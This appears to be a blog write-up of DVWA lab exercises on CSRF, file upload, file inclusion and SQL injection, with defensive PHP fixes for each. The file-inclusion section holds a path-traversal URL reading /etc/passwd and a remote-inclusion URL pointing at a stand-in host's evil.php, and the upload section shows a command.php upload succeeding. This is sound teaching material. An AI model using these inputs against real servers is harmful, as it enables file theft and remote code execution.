2/18/2011

DVWA-Cross Site Request Forgery (CSRF) : LOW Level



CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help from social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operations in the case of a normal user. If the targeted end user is the administrator account, this can compromise the entire web application.
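The standard defence is a per-session synchronizer token: the server embeds a secret in the form and refuses any state-changing request that does not echo it back. The snippet below is an added example written for this post, not DVWA's own code; it assumes PHP sessions are in use, that the handler is a hypothetical change_password.php, and that change_password() and $_SESSION['user_id'] are provided elsewhere by the application.

```php
<?php
// Added example (not DVWA's code): synchronizer-token CSRF defence for a
// password-change form. Assumes a PHP session and a hypothetical
// change_password($userId, $newPassword) application function.
session_start();

// Issue one token per session; random_bytes() is CSPRNG-backed.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison so the check leaks no timing information.
function csrf_check(?string $submitted): bool {
    return is_string($submitted)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // State-changing actions are accepted only via POST with a valid token,
    // never via a GET link that could be embedded in an <img> or an e-mail.
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    $new  = $_POST['password_new']  ?? '';
    $conf = $_POST['password_conf'] ?? '';
    if ($new !== '' && $new === $conf) {
        change_password($_SESSION['user_id'], $new);   // hypothetical app function
        echo 'Password changed.';
    } else {
        echo 'Passwords do not match.';
    }
}
?>
<form method="post" action="change_password.php">
    <input type="hidden" name="csrf_token"
           value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
    New password: <input type="password" name="password_new"><br>
    Confirm: <input type="password" name="password_conf"><br>
    <input type="submit" value="Change">
</form>
```

The token only helps if the page that renders it is itself free of XSS (an injected script could read the hidden field), and it is worth pairing with a SameSite attribute on the session cookie so the browser does not attach the session to cross-site form posts in the first place.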

DVWA-FILE UPLOAD : LOW Level

Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.

The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system, forwarding attacks to backend systems, and simple defacement. It depends on what the application does with the uploaded file, including where it is stored.

Another thing worth looking for is restrictions implemented only in 'hidden' form fields, since those are enforced by the client and can be changed freely.


../../hackable/uploads/command.php succesfully uploaded!
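A server-side upload handler that would reject command.php is shown below. It is an added example for this post, not DVWA's own code: the form field name "uploaded", the private directory $upload_dir, the size limit and the image-only allowlist are all assumptions. Every check is done on the server, so a hidden MAX_FILE_SIZE field or a spoofed Content-Type header changes nothing.

```php
<?php
// Added example (not DVWA's code): hardened upload handler for a form field
// named "uploaded". $upload_dir is an assumed directory outside the web root.
$upload_dir = '/var/app/private_uploads/';   // assumed path, not served by the web server
$max_bytes  = 100000;                        // enforced here, not via a hidden field

// Allowlist of extension => MIME type the content must actually have.
$allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png'];

// Returns the accepted extension, or null with a reason appended to $err.
function validate_upload(array $file, array $allowed, int $max_bytes, array &$err): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK)        { $err[] = 'Upload failed.';         return null; }
    if (!is_uploaded_file($file['tmp_name']))    { $err[] = 'Not an uploaded file.';  return null; }
    if ($file['size'] > $max_bytes)              { $err[] = 'File too large.';        return null; }

    // The client-supplied name is untrusted; its extension is only a lookup key.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext]))                  { $err[] = 'Extension not allowed.'; return null; }

    // Inspect the bytes, not $file['type'] (which is whatever the client sent).
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== $allowed[$ext]) {
        $err[] = 'Content does not match extension.';
        return null;
    }
    // For images, additionally require the image decoder to accept the file.
    if (@getimagesize($file['tmp_name']) === false) { $err[] = 'Not a valid image.'; return null; }
    return $ext;
}

$errors = [];
if (isset($_FILES['uploaded'])
    && ($ext = validate_upload($_FILES['uploaded'], $allowed, $max_bytes, $errors)) !== null) {
    // Server-chosen file name: no traversal, no attacker-chosen ".php" extension.
    $target = $upload_dir . bin2hex(random_bytes(16)) . '.' . $ext;
    if (move_uploaded_file($_FILES['uploaded']['tmp_name'], $target)) {
        chmod($target, 0640);            // never executable
        echo 'Upload accepted.';         // do not echo the storage path back
    } else {
        $errors[] = 'Could not store file.';
    }
}
foreach ($errors as $e) {
    echo htmlspecialchars($e, ENT_QUOTES, 'UTF-8'), '<br>';
}
```

Storing the file under a random name outside the document root and serving it through a download script (rather than by URL) removes the second half of the attack described above: even if something unexpected gets stored, the web server never executes it.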

DVWA-FILE INCLUSION : LOW Level

Some web applications allow the user to specify input that is used directly in file streams, or allow the user to upload files to the server. At a later time the web application accesses the user-supplied input in the web application's context. By doing this, the web application opens up the potential for malicious file execution.

Local Example: http://127.0.0.1/dvwa/fi/?page=../../../../../../etc/passwd

or

Remote Example: http://127.0.0.1/dvwa/fi/?page=http://www.evilsite.com/evil.php



<?php
    $file = $_GET['page']; // The page we wish to display
?>
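The line above passes the raw query parameter to include(), which is why both the local and the remote example work. The replacement below is an added example for this post, not DVWA's code: it maps the request to a fixed allowlist of page names and, as defence in depth, verifies with realpath() that the resolved file still lies under the pages directory. The page names and the pages/ directory are assumptions.

```php
<?php
// Added example (not DVWA's code): allowlist lookup instead of
// `$file = $_GET['page']`. Page names and the pages/ directory are assumed.
$pages = [
    'home'  => 'home.php',
    'help'  => 'help.php',
    'about' => 'about.php',
];

// Exact-key lookup: "../", "http://", null bytes etc. never reach include().
function resolve_page(array $pages, string $requested): ?string {
    return $pages[$requested] ?? null;
}

// Defence in depth: canonicalise and confirm the file is inside $base.
function safe_include_path(string $base, string $file): ?string {
    $base = realpath($base);
    if ($base === false) {
        return null;
    }
    $full = realpath($base . DIRECTORY_SEPARATOR . $file);
    if ($full === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : null;
}

$file = resolve_page($pages, $_GET['page'] ?? 'home');
$path = $file === null ? null : safe_include_path(__DIR__ . '/pages', $file);
if ($path === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $path;
```

Keep allow_url_include=Off in php.ini as well; with it off, PHP refuses to include a URL even if a future bug lets one reach include(), which closes the remote variant of the attack independently of application code.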

DVWA-BLIND SQL INJECTION : LOW Level


When an attacker executes SQL Injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL query's syntax is incorrect. Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather than getting a useful error message, they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through SQL statements.

The 'id' variable within this PHP script is vulnerable to SQL injection.

There are 5 users in the database, with ids from 1 to 5. Your mission... to steal passwords!

If you have received a Magicquotes error, turn them off in php.ini.

2/17/2011

DVWA-SQL INJECTION : LOW Level



A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

The 'id' variable within this PHP script is vulnerable to SQL injection.

There are 5 users in the database, with ids from 1 to 5. Your mission... to steal passwords!
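Both the classic and the blind variant above have the same fix: the 'id' value must travel to the database as a bound parameter, never as part of the SQL text, and error detail must not reach the response (a verbose error is the oracle for classic injection, a visibly different error page is the oracle for the blind one). The handler below is an added example for this post covering both sections, not DVWA's code; the DSN, credentials, and the users/user_id/first_name/last_name schema are assumptions.

```php
<?php
// Added example (not DVWA's code): the id lookup with a prepared statement.
// DSN, credentials and the users table layout are assumed placeholders.
$pdo = new PDO('mysql:host=127.0.0.1;dbname=dvwa;charset=utf8mb4', 'DB_USER', 'DB_PASS', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepares, no client-side quoting
]);

// Returns the matching row, or null when the id is malformed or unknown.
function lookup_user(PDO $pdo, string $rawId): ?array {
    // user_id is numeric, so reject anything that is not an integer up front.
    if (filter_var($rawId, FILTER_VALIDATE_INT) === false) {
        return null;
    }
    // The value is bound, not concatenated: quotes, comments or keywords in it
    // are plain data to the database and cannot alter the query structure.
    $stmt = $pdo->prepare('SELECT first_name, last_name FROM users WHERE user_id = ?');
    $stmt->execute([(int) $rawId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

try {
    $row = lookup_user($pdo, $_GET['id'] ?? '');
    if ($row === null) {
        echo 'No such user.';
    } else {
        echo 'First name: ', htmlspecialchars($row['first_name'], ENT_QUOTES, 'UTF-8'), '<br>';
        echo 'Surname: ',    htmlspecialchars($row['last_name'],  ENT_QUOTES, 'UTF-8');
    }
} catch (PDOException $e) {
    // Detail goes to the server log only; the client sees one generic message
    // regardless of what failed, so neither error text nor error type leaks.
    error_log($e->getMessage());
    http_response_code(500);
    echo 'Internal error.';
}
```

Note that magic_quotes (mentioned above as something to turn off for the lab) was never a real defence either way: escaping input is fragile, while a bound parameter is structurally separated from the query.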